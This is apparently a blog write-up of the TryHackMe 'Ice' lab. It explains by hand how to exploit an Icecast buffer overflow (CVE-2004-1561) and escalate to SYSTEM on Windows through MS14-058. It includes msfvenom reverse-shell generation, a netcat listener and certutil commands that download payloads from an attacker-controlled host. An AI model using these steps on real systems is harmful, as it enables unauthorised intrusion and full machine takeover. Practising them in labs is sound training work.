TryHackme: İce Manual Exploitation

Yusif Yagubzadeh
5 min readMar 16, 2024


Today we will take a look at TryHackMe: Ice, But Today we are going to use Manual exploitation. My goal in sharing this writeup is to show you How to manually exploit and elevate your privileges in a Windows machine. Please try to understand each step and take notes.


Nmap Command:

nmap -sCV -Pn --open -p- -v -oN Nmap:

Finding Vulnerability and Exploit

  • We can see that on Port 8000 you can see Icecast streaming service running. we take a look at cvedetails site this site give detailed information about common Vulnerabilties, and search for Icecast

as we can see Icecast Vulnerable to CVE called 2004–1561, this vulnerability use Buffer overflow and allow us to use Remote Code Execuiton (RCE)

Before using the our Exploit, we will make some minor changes to the code, First we take a look at the payload’s code

Here is the command for Shellcode generation that we will use inside the code in Our Terminal we use this command to genereate shell code for our LHOST and LPORT

msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=<Your VPN IP> LPORT=<Port you like> -f python -b '\x00\x0a\x0d'

Now We can Modify our payload and replace shellcode with our shellcode

  • Note: in shellcode remove character ‘b’ before using it

Using Exploit gaining Shell

  • Now it is to time use this exploit to gain revershell from target machine we use 2 Terminals to use this Exploit
  • Terminal 1.
    We set our Exploit with Traget machine IP
python3 <Target Machine Ip> 8000
  • Terminal 2.
    We set netcat listener to get our Shell.
nc -lvnp <Port> #LPORT number when you give in mfsvenom command

Privilege Escalation

  • Now we Gain access remote Shell now it ist time to Elevate Our Privileges, we use Winpeas and Windows Exploit suggester tools

To Transfer winpeas file to Target Machine we use Certutil

#Deploying Python web server in our terminal

python3 -m http.server <Port> #port is optional in defaul is 8000

#Get data on target machine

certutil -split -urlcache -f "http://<VPN Ip>:<Port>/file"

Note: In Target machine we don’t have permission to get data to bypass this Go to C:\Windows\Tasks folder, in this folder we have Permission get data

we can see basic system information about Target machine, Copy system info in a file we use it with windows exploit suggester

nano systeminfo.txt

Now it is time to find Exploit with Windows exploit suggester

python3 --update #To update tools database

python3 systeminfo.txt -e -i "Privilege" #-e -i is use to filter Exploit content

Our Exploit is CVE-2014–4113 this Vulnerability allow us to usent authority/system privileges for limited usage, The Source of this exploit in This Github link name MS14–058

Now it is time to Transfer Our Exploit to The Target Machine


Python3 -m http.server 8080

certutil -split -urlcache -f "" Exploit.exe

When you use Exploit with other command it runs as nt authority/system

To Escalate our Privileges we can use Revershell and run with our Exploit together, First generate our Shell

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Transfer shell exploit to Windows machine

certutil -split -urlcache -f ""

Now It is time to use Our exploit to gain access our elevated privileged shell

In A Second Terminal we listen our port


I hope You Enjoy it,

